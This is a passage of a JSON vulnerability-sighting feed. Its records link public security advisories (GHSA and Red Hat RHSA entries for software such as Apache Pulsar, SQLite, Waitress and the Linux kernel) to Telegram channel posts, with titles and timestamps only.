"https://ift.tt/802DhwB\nCVE-2024-1735 | armeria-saml up to 1.27.1 SAML Message improper authentication (GHSA-4m6j-23p2-8c54)", "creation_timestamp": "2024-03-14T08:52:01.000000Z"}, {"uuid": "c066ffcd-a286-47a9-959b-cb2e3cfc4090", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-XP2R-G8QQ-44HH", "type": "seen", "source": "https://t.me/ctinow/207277", "content": "https://ift.tt/fm7XoKM\n[GHSA-xp2r-g8qq-44hh] Apache Pulsar: Improper Input Validation in Pulsar Function Worker allows Remote Code Execution", "creation_timestamp": "2024-03-13T23:11:29.000000Z"}, {"uuid": "f944d9ff-3603-4694-b646-8960a15b6d11", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:1315", "type": "seen", "source": "https://t.me/ctinow/206856", "content": "https://ift.tt/3HpvrV5\nRHSA-2024:1315: Important: postgresql:13 security update", "creation_timestamp": "2024-03-13T16:22:12.000000Z"}, {"uuid": "5ca2fbe5-4934-47a2-a82c-7639d7baec78", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:1248", "type": "seen", "source": "https://t.me/ctinow/206855", "content": "https://ift.tt/RZNakqo\nRHSA-2024:1248: Important: kernel security update", "creation_timestamp": "2024-03-13T16:22:11.000000Z"}, {"uuid": "86c23908-c6c4-4265-b590-23ceffd5be77", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:1249", "type": "seen", "source": "https://t.me/ctinow/206854", "content": "https://ift.tt/yYPNZJR\nRHSA-2024:1249: Important: kernel security and bug fix update", "creation_timestamp": "2024-03-13T16:22:10.000000Z"}, {"uuid": "2fa7cf2d-0df2-4177-968b-09995aca65b5", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:1250", "type": "seen", "source": "https://t.me/ctinow/206853", "content": "https://ift.tt/e1Db08w\nRHSA-2024:1250: Important: kernel security and bug fix update", "creation_timestamp": "2024-03-13T16:22:09.000000Z"}, {"uuid": "d34944aa-fa1e-4e9f-9a4e-57791e2afdee", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:1251", "type": "seen", "source": "https://t.me/ctinow/206852", "content": "https://ift.tt/ZbtEBzf\nRHSA-2024:1251: Important: kpatch-patch security update", "creation_timestamp": "2024-03-13T16:22:07.000000Z"}, {"uuid": "3ec4adfd-c2d4-4b6c-a8c0-6788893f699d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:1253", "type": "seen", "source": "https://t.me/ctinow/206851", "content": "https://ift.tt/EVDuSwC\nRHSA-2024:1253: Important: kernel live patch module security update", "creation_timestamp": "2024-03-13T16:22:06.000000Z"}, {"uuid": "42cb5186-f602-4467-ae54-72dd2a6808cb", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:1268", "type": "seen", "source": "https://t.me/ctinow/206850", "content": "https://ift.tt/VBMpWm4\nRHSA-2024:1268: Important: kernel security and bug fix update", "creation_timestamp": "2024-03-13T16:22:05.000000Z"}, {"uuid": "c4827ecb-bd54-49b0-a244-65b386b402d1", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-C35H-W8HJ-MM55", "type": "seen", "source": "https://t.me/ctinow/207268", "content": "https://ift.tt/G3oOjYt\n[GHSA-c35h-w8hj-mm55] Apache Pulsar: Improper Authentication for Pulsar Proxy Statistics Endpoint", "creation_timestamp": "2024-03-13T23:01:24.000000Z"}, {"uuid": "0873b05f-512f-470a-ba41-ec49f86562f2", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-8G38-3M6V-232J", "type": "seen", "source": "https://t.me/ctinow/206878", "content": "https://ift.tt/3BcHiUe\n[GHSA-8g38-3m6v-232j] Potential log injection in reset user endpoint in CKAN", "creation_timestamp": "2024-03-13T16:46:46.000000Z"}, {"uuid": "536372e7-769a-4ef5-aff2-82f20a0076fc", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-PR2M-PX7J-XG65", "type": "seen", "source": "https://t.me/ctinow/206877", "content": "https://ift.tt/BHC69ez\n[GHSA-pr2m-px7j-xg65] aiosmtpd vulnerable to SMTP smuggling", "creation_timestamp": "2024-03-13T16:46:45.000000Z"}, {"uuid": "1ed7f648-0ffd-4df6-aa02-09542cf94443", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-78WX-JG4J-5J6G", "type": "seen", "source": "https://t.me/ctinow/206876", "content": "https://ift.tt/Btq0cWP\n[GHSA-78wx-jg4j-5j6g] quiche vulnerable to unlimited resource allocation by QUIC CRYPTO frames flooding", "creation_timestamp": "2024-03-13T16:46:43.000000Z"}, {"uuid": "32c9ddef-1dd3-4522-9e32-ac6782198726", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-XHG9-XWCH-VR7X", "type": "seen", "source": "https://t.me/ctinow/206875", "content": "https://ift.tt/W3pQ1JB\n[GHSA-xhg9-xwch-vr7x] quiche vulnerable to unbounded storage of information related to connection ID retirement", "creation_timestamp": "2024-03-13T16:46:41.000000Z"}, {"uuid": "88017c8e-d6b1-4987-9ade-8535b0c3efb4", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:1269", "type": "seen", "source": "https://t.me/ctinow/206849", "content": "https://ift.tt/sx8ecPQ\nRHSA-2024:1269: Important: kernel-rt security update", "creation_timestamp": "2024-03-13T16:22:01.000000Z"}, {"uuid": "0f7c1c54-fcd8-42fb-916d-031dde92c5ea", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:1270", "type": "seen", "source": "https://t.me/ctinow/206848", "content": "https://ift.tt/J2QxRW5\nRHSA-2024:1270: Important: docker security update", "creation_timestamp": "2024-03-13T16:22:00.000000Z"}, {"uuid": "259b4be4-d928-4e69-af32-ad0c62840f4e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:1278", "type": "seen", "source": "https://t.me/ctinow/206847", "content": "https://ift.tt/CxRL3BQ\nRHSA-2024:1278: Important: kpatch-patch security update", "creation_timestamp": "2024-03-13T16:21:59.000000Z"}, {"uuid": "843c0d79-4715-420c-8e94-3629196ec457", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:1240", "type": "seen", "source": "https://t.me/ctinow/206846", "content": "https://ift.tt/CY109fb\nRHSA-2024:1240: Important: postgresql security update", "creation_timestamp": "2024-03-13T16:21:58.000000Z"}, {"uuid": "337ab3c3-7a39-47f4-b9e1-03a37df87adf", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:1311", "type": "seen", "source": "https://t.me/ctinow/206858", "content": "https://ift.tt/3jUBVem\nRHSA-2024:1311: Moderate: .NET 8.0 security update", "creation_timestamp": "2024-03-13T16:22:14.000000Z"}, {"uuid": "58da50ea-3c92-4cc5-9910-0d74789b2488", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-95RX-M9M5-M94V", "type": "seen", "source": "https://t.me/ctinow/205849", "content": "https://ift.tt/FgXQe4H\n[GHSA-95rx-m9m5-m94v] ASA-2024-006: ValidateVoteExtensions helper function in Cosmos SDK may allow incorrect voting power assumptions", "creation_timestamp": "2024-03-12T16:57:05.000000Z"}, {"uuid": "8237e942-94d5-4fcc-a5df-92d0c2d267d9", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-F78J-4W3G-4Q65", "type": "seen", "source": "https://t.me/ctinow/205848", "content": "https://ift.tt/ZixmBfW\n[GHSA-f78j-4w3g-4q65] StimulusReflex arbitrary method call", "creation_timestamp": "2024-03-12T16:57:04.000000Z"}, {"uuid": "6eed01af-52e6-4eec-9f7b-9cfbaa8f789e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-242P-4V39-2V8G", "type": "seen", "source": "https://t.me/ctinow/205835", "content": "https://ift.tt/vqXD48i\n[GHSA-242p-4v39-2v8g] Cross-site Scripting (XSS) possible with maliciously formed HTML attribute names and values in Phlex", "creation_timestamp": "2024-03-12T16:46:09.000000Z"}, {"uuid": "47160e8b-b52a-4f25-abe0-c6546c5fd33d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-GF8P-V3G3-3WPH", "type": "seen", "source": "https://t.me/ctinow/206766", "content": "https://ift.tt/eVsY340\nCVE-2024-25129 | GitHub codeql-cli-binaries up to 2.16.2 xml external entity reference (GHSA-gf8p-v3g3-3wph)", "creation_timestamp": "2024-03-13T15:17:10.000000Z"}, {"uuid": "78558866-8048-4992-a97d-fd2825741b11", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2020:0514", "type": "seen", "source": "https://t.me/ctinow/209643", "content": "https://ift.tt/AsnDJG8\nCVE-2019-19923 | SQLite 3.30.1 SELECT DISTINCT select.c flattenSubquery null pointer dereference (RHSA-2020:0514)", "creation_timestamp": "2024-03-16T18:21:43.000000Z"}, {"uuid": "ec185d17-f101-4816-8c37-bd7f8279e40b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2020:0573", "type": "seen", "source": "https://t.me/ctinow/205345", "content": "https://ift.tt/m2GQezU\nCVE-2019-16777 | npm CLI up to 6.13.4 Install Script path traversal (RHSA-2020:0573)", "creation_timestamp": "2024-03-12T07:36:40.000000Z"}, {"uuid": "6ef73bff-f985-426d-9803-cd9a01debb0b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:1255", "type": "seen", "source": "https://t.me/ctinow/211099", "content": "https://ift.tt/5JI7gME\nRHSA-2024:1255: Moderate: OpenShift Container Platform 4.15.3 bug fix and security update", "creation_timestamp": "2024-03-19T02:16:32.000000Z"}, {"uuid": "c487d110-6b4a-4bff-a430-c25a75e33396", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:1367", "type": "seen", "source": "https://t.me/ctinow/211098", "content": "https://ift.tt/BhUYTEr\nRHSA-2024:1367: Important: kernel security and bug fix update", "creation_timestamp": "2024-03-19T02:16:31.000000Z"}, {"uuid": "20517e9e-e7af-46fc-b446-9c6c7a59d26c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:1368", "type": "seen", "source": "https://t.me/ctinow/211097", "content": "https://ift.tt/40DPVjd\nRHSA-2024:1368: Important: kpatch-patch security update", "creation_timestamp": "2024-03-19T02:16:30.000000Z"}, {"uuid": "b2c0d2a2-3d2f-46c0-94bf-283c696ef351", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-57F2-8P89-66X6", "type": "seen", "source": "https://t.me/ctinow/206633", "content": "https://ift.tt/HVRPU38\nCVE-2024-26481 | Kirby CMS 4.1.0 URL Parameter cross site scripting (GHSA-57f2-8p89-66x6)", "creation_timestamp": "2024-03-13T12:36:51.000000Z"}, {"uuid": "7da3bbca-be05-403d-9536-7c664e16326c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-HGJH-9RJ2-G67J", "type": "seen", "source": "https://t.me/ctinow/210785", "content": "https://ift.tt/4z0bVvy\n[GHSA-hgjh-9rj2-g67j] Spring Framework URL Parsing with Host Validation Vulnerability", "creation_timestamp": "2024-03-18T17:36:33.000000Z"}, {"uuid": "9bcb29d3-f64c-419c-b841-28091caee7de", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-XRVH-RVC4-5M43", "type": "seen", "source": "https://t.me/ctinow/206617", "content": "https://ift.tt/JOES0rN\nCVE-2024-26483 | Kirby CMS 4.1.0 Profile Image Module unrestricted upload (GHSA-xrvh-rvc4-5m43)", "creation_timestamp": "2024-03-13T12:07:47.000000Z"}, {"uuid": "4d77098e-c4ae-430d-a986-5932293b8c62", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:1316", "type": "seen", "source": "https://t.me/ctinow/210819", "content": "https://ift.tt/XJa6NLU\nRHSA-2024:1316: Moderate: Red Hat JBoss Core Services Apache HTTP Server 2.4.57 SP3 security update", "creation_timestamp": "2024-03-18T18:16:23.000000Z"}, {"uuid": "84a9d5cd-3fef-4c44-a83b-3e92b0c0e0ba", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-FR3W-2P22-6W7P", "type": "seen", "source": "https://t.me/ctinow/206201", "content": "https://ift.tt/I4U8dQ0\n[GHSA-fr3w-2p22-6w7p] URL Redirection to Untrusted Site in OAuth2/OpenID in directus", "creation_timestamp": "2024-03-12T21:56:16.000000Z"}, {"uuid": "4e303d0c-2997-4256-a123-74b2c20cf8c4", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-2CCR-G2RV-H677", "type": "seen", "source": "https://t.me/ctinow/206200", "content": "https://ift.tt/KbpBth9\n[GHSA-2ccr-g2rv-h677] Session Token in URL in directus", "creation_timestamp": "2024-03-12T21:56:15.000000Z"}, {"uuid": "489c1232-0fa1-46a7-a38d-83b37ca3647b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:1376", "type": "seen", "source": "https://t.me/ctinow/211585", "content": "https://ift.tt/gIPXq1C\nRHSA-2024:1376: Important: squid security update", "creation_timestamp": "2024-03-19T15:16:57.000000Z"}, {"uuid": "2ee4dac0-461d-42af-8cc9-bd0080c82e79", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-5FXJ-WHCV-CRRC", "type": "seen", "source": "https://t.me/ctinow/206153", "content": "https://ift.tt/YnQ47PT\n[GHSA-5fxj-whcv-crrc] Microsoft Security Advisory CVE-2024-21392: .NET Denial of Service Vulnerability", "creation_timestamp": "2024-03-12T21:16:20.000000Z"}, {"uuid": "68f18f9b-7871-40b6-bd1d-1d804ce21b08", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2020:0475", "type": "seen", "source": "https://t.me/ctinow/205498", "content": "https://ift.tt/lzNLnds\nCVE-2019-10773 | Yarn up to 1.21.0 Package Installer link following (RHSA-2020:0475)", "creation_timestamp": "2024-03-12T10:36:31.000000Z"}, {"uuid": "fcbb2826-c14c-48dc-b49d-085c2a697a16", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2020:0514", "type": "seen", "source": "https://t.me/ctinow/209645", "content": "https://ift.tt/lDOGP5U\nCVE-2019-19925 | SQLite 3.30.1 Update ext/misc/zipfile.c zipfileUpdate ZIP Archive unrestricted upload (RHSA-2020:0514)", "creation_timestamp": "2024-03-16T18:21:45.000000Z"}, {"uuid": "026bbb26-79e3-479e-b41b-ecb257d41f96", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:1354", "type": "seen", "source": "https://t.me/ctinow/210428", "content": "https://ift.tt/Wz3QeEj\nRHSA-2024:1354: Important: rh-nodejs14 security update", "creation_timestamp": "2024-03-18T12:16:21.000000Z"}, {"uuid": "2688c0dd-4ffb-492b-af80-e7a566820643", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:1346", "type": "seen", "source": "https://t.me/ctinow/210220", "content": "https://ift.tt/gMHrNDY\nRHSA-2024:1346: Important: Red Hat OpenShift GitOps security update", "creation_timestamp": "2024-03-18T07:16:53.000000Z"}, {"uuid": "f35e54c2-3ac1-4751-af29-825da1272520", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-PG4X-64RH-3C9V", "type": "seen", "source": "https://t.me/ctinow/209872", "content": "https://ift.tt/EYZNbG0\nCVE-2019-16781 | WordPress up to 5.3.0 Block Editor cross site scripting (GHSA-pg4x-64rh-3c9v)", "creation_timestamp": "2024-03-17T11:41:30.000000Z"}, {"uuid": "eee3a22c-8344-4416-8993-d6b9129de522", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2020:0720", "type": "seen", "source": "https://t.me/ctinow/209873", "content": "https://ift.tt/omIhU4N\nCVE-2019-16789 | Waitress up to 1.4.0 Proxy HTTP Request request smuggling (RHSA-2020:0720)", "creation_timestamp": "2024-03-17T11:41:32.000000Z"}, {"uuid": "bc643d61-42d8-46c1-90dc-abf459478202", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:1082", "type": "seen", "source": "https://t.me/ctinow/200069", "content": "https://ift.tt/ieTBp8A\nRHSA-2024:1082: Moderate: gnutls security update", "creation_timestamp": "2024-03-05T10:12:49.000000Z"}, {"uuid": "42e9bbf1-bc66-4199-9b91-fb922f905b70", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2020:0514", "type": "seen", "source": "https://t.me/ctinow/209525", "content": "https://ift.tt/s54eHdF\nCVE-2019-19926 | SQLite 3.30.1 Incomplete Fix CVE-2019-19880 select.c multiSelect null pointer dereference (RHSA-2020:0514)", "creation_timestamp": "2024-03-16T13:16:29.000000Z"}, {"uuid": "3b5290cf-f5a6-490e-94aa-1b1c6cf02016", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2020:0720", "type": "seen", "source": "https://t.me/ctinow/209458", "content": "https://ift.tt/CDq2gZ0\nCVE-2019-16785 | Waitress up to 1.3.1 HTTP Message Split request smuggling (RHSA-2020:0720)", "creation_timestamp": "2024-03-16T10:16:46.000000Z"}, {"uuid": "0a1f230f-011f-4311-9795-465fda770d5a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2019:4238", "type": "seen", "source": "https://t.me/ctinow/203969", "content": "https://ift.tt/frZPGyX\nCVE-2019-13726 | Google Chrome prior 79.0.3945.79 Password Manager HTML Page memory corruption (RHSA-2019:4238)", "creation_timestamp": "2024-03-09T15:16:34.000000Z"}, {"uuid": "19b68dcd-077b-4272-957a-8bdc60f594d1", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-757H-RW37-66HW", "type": "seen", "source": "https://t.me/ctinow/203189", "content": "https://ift.tt/ioAP9xs\nCVE-2023-6749 | zephyrproject-rtos Zephyr up to 3.5 Settings Shell stack-based overflow (GHSA-757h-rw37-66hw)", "creation_timestamp": "2024-03-08T09:52:01.000000Z"}, {"uuid": "e3724a28-cf99-4bed-9275-27361ec50abd", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-32F5-3P9H-2RQC", "type": "seen", "source": "https://t.me/ctinow/203196", "content": "https://ift.tt/q0WfSeJ\nCVE-2023-6249 | zephyrproject-rtos Zephyr up to 3.5 esp32_ipm_send type conversion (GHSA-32f5-3p9h-2rqc)", "creation_timestamp": "2024-03-08T10:22:11.000000Z"}, {"uuid": "5feb1781-101f-43a0-bc21-d784f8a6cd8e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-H3M7-RQC4-7H9P", "type": "seen", "source": "https://t.me/ctinow/198175", "content": "https://ift.tt/PTfYm4R\n[GHSA-h3m7-rqc4-7h9p] Integer overflow in chunking helper causes dispatching to miss elements or panic", "creation_timestamp": "2024-03-02T00:46:51.000000Z"}, {"uuid": "b2c9ce39-e3b3-498f-9ce6-96c96b1e2033", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2019:4238", "type": "seen", "source": "https://t.me/ctinow/203997", "content": "https://ift.tt/A0TJn2f\nCVE-2019-13740 | Google Chrome prior 79.0.3945.79 Security UI HTML Page Domain input validation (RHSA-2019:4238)", "creation_timestamp": "2024-03-09T16:46:38.000000Z"}, {"uuid": "5c1d2f3c-4862-4fef-b6a4-31ba2d93c90d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:1103", "type": "seen", "source": "https://t.me/ctinow/200151", "content": "https://ift.tt/L0fXmkt\nRHSA-2024:1103: Moderate: emacs security update", "creation_timestamp": "2024-03-05T12:17:32.000000Z"}, {"uuid": "811cffe5-585e-47ea-b937-c169b637c1fa", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:1106", "type": "seen", "source": "https://t.me/ctinow/200150", "content": "https://ift.tt/uKbO6Bh\nRHSA-2024:1106: Moderate: fwupd security update", "creation_timestamp": "2024-03-05T12:17:31.000000Z"}, {"uuid": "4c5979a6-22ce-4044-a0fc-b170ba334fe2", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2019:4358", "type": "seen", "source": "https://t.me/ctinow/203865", "content": "https://ift.tt/4TIdVSh\nCVE-2019-19687 | OpenStack Keystone 15.0.0/16.0.0 Credentials API /v3/credentials insufficiently protected credentials (RHSA-2019:4358)", "creation_timestamp": "2024-03-09T10:06:19.000000Z"}, {"uuid": "f84befbc-5c11-4ef3-b05b-0537069ac278", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2020:0720", "type": "seen", "source": "https://t.me/ctinow/209459", "content": "https://ift.tt/tM0fpY8\nCVE-2019-16786 | Waitress up to 1.3.1 HTTP Header Transfer-Encoding request smuggling (RHSA-2020:0720)", "creation_timestamp": "2024-03-16T10:16:48.000000Z"}, {"uuid": "ab245176-fd32-4c96-9983-15acb9658853", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2017:0868", "type": "seen", "source": "https://t.me/ctinow/209431", "content": "https://ift.tt/WsfI89L\nCVE-2016-1000229 | Swagger-UI Key Name cross site scripting (RHSA-2017:0868 / BID-97580)", "creation_timestamp": "2024-03-16T09:22:09.000000Z"}, {"uuid": "0caf6370-e8c4-4e30-b442-eda81b7ea1c0", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2016:1605", "type": "seen", "source": "https://t.me/ctinow/209430", "content": "https://ift.tt/jqZL8no\nCVE-2016-1000022 | negotiator up to 0.6.0 Regular Expression resource consumption (RHSA-2016:1605 / Nessus ID 119377)", "creation_timestamp": "2024-03-16T09:22:07.000000Z"}, {"uuid": "3ec73c6d-1042-4c6d-abb1-e60c04357c1b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:1110", "type": "seen", "source": "https://t.me/ctinow/200416", "content": "https://ift.tt/VMjve9d\nRHSA-2024:1110: Moderate: device-mapper-multipath security update", "creation_timestamp": "2024-03-05T16:17:04.000000Z"}, {"uuid": "f47f9bfe-1d4c-4dca-85a6-df31c115969f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:1112", "type": "seen", "source": "https://t.me/ctinow/200415", "content": "https://ift.tt/paP0Qc7\nRHSA-2024:1112: Important: linux-firmware security update", "creation_timestamp": "2024-03-05T16:17:03.000000Z"}, {"uuid": "0f8c4d8b-a457-4e9d-954e-39346f72e02d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:1113", "type": "seen", "source": "https://t.me/ctinow/200414", "content": "https://ift.tt/Jnwo7Kj\nRHSA-2024:1113: Moderate: frr security update", "creation_timestamp": "2024-03-05T16:17:02.000000Z"}, {"uuid": "0a8f289f-2012-45da-9e5d-6020c17f39f7", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-J2V7-4F6V-GPG8", "type": "seen", "source": "https://t.me/ctinow/197663", "content": "https://ift.tt/pNUWmjV\nCVE-2024-24577 | libgit2 up to 1.6.4/1.7.1 src/libgit2/index.c git_index_add heap-based overflow (GHSA-j2v7-4f6v-gpg8)", "creation_timestamp": "2024-03-01T14:46:52.000000Z"}, {"uuid": "a6b8471e-2e83-4dfc-a319-0720fd520f6d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2023:7197", "type": "seen", "source": "https://t.me/ctinow/195728", "content": "https://ift.tt/z7vAYma\nRHSA-2023:7197: Critical: OpenShift Container Platform 4.15.0 security and extras update", "creation_timestamp": "2024-02-28T18:22:30.000000Z"}, {"uuid": "76be08ea-4bd7-48ae-bb7c-ce0c5b8bbd83", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2023:7198", "type": "seen", "source": "https://t.me/ctinow/195727", "content": "https://ift.tt/2SoWxYt\nRHSA-2023:7198: Critical: OpenShift Container Platform 4.15.0 bug fix and security update", "creation_timestamp": "2024-02-28T18:22:29.000000Z"}, {"uuid": "a5d71297-3316-4dd1-a1ed-05aaf46821c6", 